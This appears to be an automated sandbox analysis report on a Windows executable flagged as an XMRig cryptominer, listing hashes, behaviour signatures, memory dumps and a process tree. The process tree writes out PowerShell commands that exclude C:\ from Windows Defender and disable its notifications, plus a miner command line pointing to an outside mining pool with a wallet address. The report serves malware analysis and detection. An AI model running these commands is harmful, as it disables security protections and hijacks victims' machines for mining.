Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/12/2024, 11:23

General

  • Target

    JaffaCakes118_ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372.exe

  • Size

    5.5MB

  • MD5

    ac1db2e5e852112f8a4e8405842a0bb8

  • SHA1

    de44037d60b513ef07d58165304844ca845492eb

  • SHA256

    ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372

  • SHA512

    1d0638c28a2383597a3c728b79e3967a9ca4e949ef1709cc1854fb96d3e2c7904e888ad78d8472d8cec2101caf8cd0100a55c2d5575c1e1a04b10836651317fb

  • SSDEEP

    98304:k2im1GVdUS4liwtcr07coc20OBR7diTUcOZWL7QcDoPjhPc8RjAyIKOQoa1:kSwz4liwtZcoc6ldSkK2AyHOQn

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ae90d6fabc9bea021dcb788a0c5320b0aea8784d8ea0d1dafa90827545ccb372.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Set-MpPreference -PUAProtection 1
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Add-MpPreference -ExclusionPath C:\
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4468
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 60 -o pool.supportxmr.com:3333 -u 49ZMf9zqpebBFbM1oeZChGHGhcuvZReqAiy1n9fq4FcbJeYv3FbGYwfUqsTM7p3CYCN7grTf3PYeYJh5y6YGpK879aJ5Xw8.INTELRIG6
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2756

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    217d9191dfd67252cef23229676c9eda

    SHA1

    80d940b01c28e3933b9d68b3e567adc2bac1289f

    SHA256

    e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

    SHA512

    86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    421272b37c814e58cb34e84c4bf621f8

    SHA1

    3b24c81d08fe0ebae60ee8d9fd7ab9421dc74057

    SHA256

    376f1abfb8caf7f74363a99e71fa5be80a3b9cd2cd394eda98f12364f198a075

    SHA512

    0d4a06a52fd46165d1296438550341bf25068cb9e58696096fe89f1adb70c52bb8752ea178453a82e963967215b50b22d6a8333e3074cb5cbf56ff6524df1f89

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkuoywvw.mqn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1968-44-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/1968-9-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/1968-8-0x000001FC59650000-0x000001FC59672000-memory.dmp

    Filesize

    136KB

  • memory/1968-23-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/1968-34-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/2756-37-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-52-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-38-0x0000026DC85E0000-0x0000026DC85F4000-memory.dmp

    Filesize

    80KB

  • memory/2756-47-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-35-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-49-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-50-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-36-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/2756-51-0x0000000140000000-0x0000000140711000-memory.dmp

    Filesize

    7.1MB

  • memory/3344-1-0x000002C3652A0000-0x000002C365820000-memory.dmp

    Filesize

    5.5MB

  • memory/3344-2-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/3344-0-0x00007FF8ABFF3000-0x00007FF8ABFF5000-memory.dmp

    Filesize

    8KB

  • memory/3344-53-0x00007FF8ABFF3000-0x00007FF8ABFF5000-memory.dmp

    Filesize

    8KB

  • memory/3344-54-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4468-48-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4468-33-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB